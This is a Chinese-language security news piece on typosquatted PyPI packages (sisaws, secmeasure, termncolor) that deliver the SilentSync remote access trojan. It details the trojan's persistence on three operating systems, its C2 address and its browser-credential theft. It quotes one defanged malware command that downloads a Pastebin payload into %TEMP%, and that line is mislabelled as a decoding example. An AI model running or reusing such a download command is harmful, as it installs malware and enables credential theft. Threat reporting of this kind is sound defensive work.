Python开发者在Python包索引(PyPI)中面临着日益增长的拼写劫持包威胁,恶意行为者正越来越多地瞄准这个受信任的代码库来分发复杂的恶意软件。
最近的发现揭示了一个令人担忧的趋势:威胁行为者创建的软件包与合法库极为相似,他们通过细微的拼写差异来诱骗毫无防备的开发者安装有害代码。
2025年7月,安全研究人员开始追踪一系列采用这种欺骗性技术的恶意Python包。
一个名为termncolor的包的初步发现,标志着一场更广泛的、针对Python开发社区的攻击活动的开始。
这些软件包展示了供应链攻击是如何演变的,其目的是利用开发者对开源代码库的信任。
2025年8月初,威胁显著升级,当时Zscaler的分析师发现了另外两个名为sisaws和secmeasure的恶意Python包。
这两个包裹都被追踪到来自同一作者,并且携带了一种新发现的名为SilentSync的远程访问木马。
sisaws包专门利用打字误植攻击合法的sisa包,后者为阿根廷国家卫生信息系统(Sistema Integrado de Información Sanitaria Argentino)提供集成功能。
这些恶意软件包展示了复杂的社会工程学技术,精心模仿了其合法对应软件的功能和外观。
这些威胁行为者展现出了极高的细节关注度,确保其包裹能通过常规检查,同时将危险的有效载荷交付机制隐藏在看似无害的初始化函数中。
SilentSync远程访问木马(RAT)是基于Python的恶意软件的一项重大进步,它整合了跨平台持久化机制、全面的数据窃取能力以及复杂的命令与控制通信协议。
目前,SilentSync通过恶意的PyPI包针对Windows系统进行攻击,同时其内置了对Linux和macOS环境的兼容性,这表明该攻击活动未来可能会进一步扩大范围。
持久化与规避机制
SilentSync采用了特定于平台的持久化技术,这体现了该恶意软件复杂的设计理念。
该远程访问工具会根据目标操作系统采用不同的方法,以确保无论受害者的环境如何都能持续访问。
在Windows系统上,SilentSync通过在HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run注册表项下创建一个名为PyHelper的注册表项来建立持久化,从而在系统启动时自动运行恶意脚本。
这种恶意软件的Linux持久化机制包括修改受害者的crontab配置文件,插入一个@reboot指令,该指令会在系统重启时执行有效载荷。
对于macOS目标,SilentSync会在~/Library/LaunchAgents目录中生成一个名为com[.]apple[.]pyhelper[.]plist的属性列表文件,并将自身注册为在用户登录会话期间激活的启动代理。
SilentSync的命令与控制基础设施利用HTTP通信,其硬编码服务器的IP地址为200.58.107.25,该地址以Base64编码存储,并在运行时解码以规避静态分析。
该恶意软件使用TCP端口5000实现了REST API架构,具有用于不同操作功能的特定端点,包括连接信标、命令请求、状态报告和数据泄露。
# Example of SilentSync's hex decoding mechanism used in the malicious packages
curl - sL https[:]//pastebin[.]com/raw/jaH2uRE1 - o %TEMP%\\helper[.]py
远程访问工具(RAT)的数据收集能力不仅限于基本的文件窃取,还包括全面的浏览器数据收集。
SilentSync专门针对基于Chromium的浏览器(包括Chrome、Edge和Brave)以及Firefox,从每个配置文件中提取四类关键数据:浏览历史、自动填充信息、存储的Cookie和保存的凭据。
成功窃取数据后,恶意软件会系统性地清除其在受感染系统中留下的所有活动痕迹,以将被检测的风险降至最低。
1. 本版块文章内容及资料部分来源于网络,不代表本站观点,不对其真实性负责,也不构成任何建议。
2. 部分内容由网友自主投稿、编辑整理上传,本站仅提供交流平台,不为该类内容的版权负责。
3. 本版块提供的信息仅作参考,不保证信息的准确性、有效性、及时性和完整性。
4. 若您发现本版块有侵犯您知识产权的内容,请及时与我们联系,我们会尽快修改或删除。
5. 使用者违规、不可抗力(如黑客攻击)或第三方擅自转载引发的争议,联盟不承担责任。
6. 联盟可修订本声明,官网发布即生效,继续使用视为接受新条款。